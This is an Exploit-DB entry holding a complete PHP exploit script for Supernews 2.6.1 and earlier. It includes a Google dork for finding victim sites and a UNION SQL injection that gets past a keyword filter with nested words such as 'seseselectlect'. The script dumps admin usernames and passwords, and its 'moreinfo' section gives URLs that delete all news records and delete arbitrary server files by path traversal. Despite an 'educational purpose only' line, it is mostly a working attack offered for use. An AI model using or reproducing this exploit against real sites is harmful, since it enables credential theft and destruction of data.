Supernews 2.6.1 - SQL Injection

EDB-ID:

18913

CVE:





Platform:

PHP

Date:

2012-05-21


<?php
# Exploit Title: Supernews <= 2.6.1 SQL Injection Exploit
# Google Dork: intext:"2003 - 2004 : SuperNews : Todos os direitos reservados"
# Date: 2012/
# Author: WhiteCollarGroup
# Software Link: http://phpbrasil.com/script/vT0FaOCySSH/supernews
# Version: 2.6.1
# Tested on: Debian GNU/Linux

/*
Exploit for educational purpose only.
Note sent to the developer Fernando Pontes by e-mail odnanrefsetnop@bol.com.br

SuperNews are a brazilian news system in PHP and MySQL.
Versions priors to 2.6 have a simple SQL Injection on view news.
The developer tried to fix the bug removing keywords like "union" and "select".
But, with a recursion, it's possible to bypass this filters. See:
seselectlect
After removing "select" word, will stay another "select" word. See more:
seSELECTlect

Another SQL Injection on the administration panel:
When deleting a post, you can inject SQL for delete all news on the database.

Another vulnerability allows to delete files, on the administration panel:
When deleting a post, a variable called "unlink" will talk to the system the new's image for delete.
But it's possible to delete others files, typing all the file path or using "../".

Usage:
php exploit.php http://target.com/supernews/

For more info about vulnerabilities:
php exploit.php moreinfo

Example:
$ php exploit.php http://target.com/news/

Supernews <= 2.6.1 SQL Injection Exploit
Coded by WhiteCollarGroup - www.wcgroup.host56.com
Use at your own risk.


[*] Trying to access server...
[*] Detecting version... :-o
[!] Version: >2.6.1 :-)
[!] Administration panel: http://target.com/news/admin/adm_noticias.php
[i] Type "exploit.php moreinfo" for get others vulnerabilities.
[*] Getting user & pass 8-]
User: user1
Pass: pass1

User: user2
Pass: pass2

Good luck! :-D

*/

error_reporting(E_ERROR);
set_time_limit(0);
@ini_set("default_socket_timeout", 30);

function hex($string){
    $hex=''; // PHP 'Dim' =]
    for ($i=0; $i < strlen($string); $i++){
        $hex .= dechex(ord($string[$i]));
    }
    return '0x'.$hex;
}
function str_replace_every_other($needle, $replace, $haystack, $count=null, $replace_first=true) {
    $count = 0;
    $offset = strpos($haystack, $needle);
    //If we don't replace the first, go ahead and skip it
    if (!$replace_first) {
        $offset += strlen($needle);
        $offset = strpos($haystack, $needle, $offset);
    }
    while ($offset !== false) {
        $haystack = substr_replace($haystack, $replace, $offset, strlen($needle));
        $count++;
        $offset += strlen($replace);
        $offset = strpos($haystack, $needle, $offset);
        if ($offset !== false) {
            $offset += strlen($needle);
            $offset = strpos($haystack, $needle, $offset);
        }
    }
    return $haystack;
}
function removeaddregex($str) {
  return str_replace_every_other('(.*)', '', $str, null, false);
}
function preg_quote_working($str) {
  $chars = explode(" ", "\ . + * ? [ ^ ] $ ( ) { } = ! < > | :");
  foreach($chars as $char) {
    $str = str_replace($char, "\\".$char, $str);
  }
  return $str;
}

echo "\nSupernews <= 2.6.1 SQL Injection Exploit";
echo "\nCoded by WhiteCollarGroup - www.wcgroup.host56.com\nUse at your own risk.\n\n";

if($argc!=2) {
  echo "Usage:
php $argv[0] url
Example:
php $argv[0] http://target.com/supernews
php $argv[0] https://target.com/supernews/";
  exit;
}

if($argv[1]=="moreinfo") {
  echo "\nMore vulnerabilities:
 - Deleting files
  You can delete files on the server, after login, using the URL:
   http://server.com/admin/adm_noticias.php?deleta=ID&unlink=FILE
  Replace \"ID\" with a valid post ID (will be deleted) and FILE with the file address on the server.

 - Deleting all news on the database:
  You can delete all news on the database with one request, only. Look:
   http://server.com/admin/adm_noticias.php?deleta=0%20or%201=1--+

  All vulnerabilities discovered by WCGroup.\n";
  exit;
}

$uri = $argv[1];
if(substr($uri, -1, 1)!="/") {
  $uri .= "/";
}
$url = $uri."noticias.php?noticia=".urlencode("-1")."+";
echo "\n[*] Trying to access server...";
$accessvr = @file_get_contents($url);
if(($accessvr==false) OR (preg_match("/(404|mysql_query)/", $accessvr))) {
  $url = $uri."index.php?noticia=".urlencode("-1")."+";
}

$token = substr(md5(chr(rand(48, 122))), 0, 10);

echo "\n[*] Detecting version... :-o";

$gettoken = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,".hex($token).",6,7-- ")));
if(preg_match("/".$token."/", $gettoken)) {
  echo "\n[!] Version: >2.6.1 :-)";
  $version = 1;
} else {
  $gettoken = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,".hex($token).",7,8-- ")));
  if(preg_match("/".$token."/", $gettoken)) {
    echo "\n[!] Version =2.6.1 :-)";
    $version = 2;
  } else {
    echo "\n[-] Unknown version :-S";
    $version = 3;
  }
}
if($version!=3) {
  echo "\n[!] Administration panel: {$uri}admin/adm_noticias.php";
  echo "\n[i] Type \"$argv[0] moreinfo\" for get others vulnerabilities.";
  echo "\n[*] Getting user & pass 8-]";
}

if($version==1) {
  $i = 0;
  while(true) {
    $request = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),6,7 from supernews_login limit $i,1-- ")));
    preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
    if($get[1][0]!="") {
      $user = $get[1][0];
      $pass = $get[2][0];
      echo "\nUser: $user\nPass: $pass\n";
      $i++;
    } else {
      echo "\nGood luck! :-D";
      break;
    }
  }
}
elseif($version==2) {
  $i = 0;
  while(true) {
    $request = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),7,8 from supernews_login limit $i,1-- ")));
    preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
    if($get[1][0]!="") {
      $user = $get[1][0];
      $pass = $get[2][0];
      echo "\nUser: $user\nPass: $pass\n";
      $i++;
    } else {
      echo "\nGood luck! :-D";
      break;
    }
  }
}
else {
  echo "\n\nThis site are using an unknown version of Supernews or another CMS.";
  echo "\nPlease note that only versions <= 2.6.1 of Supernews are vulnerable.";
  echo "\nWebservers with modules or firewalls like \"mod_security\" aren't vulnerables.";
  echo "\nIf you want, try to access manually:";
  echo "\nThe vulnerability are on view notice file (index.php or noticia.php), in variable \"noticia\", a simple SQL Injection.";
  echo "\nWe're sorry.";
}

echo "\n";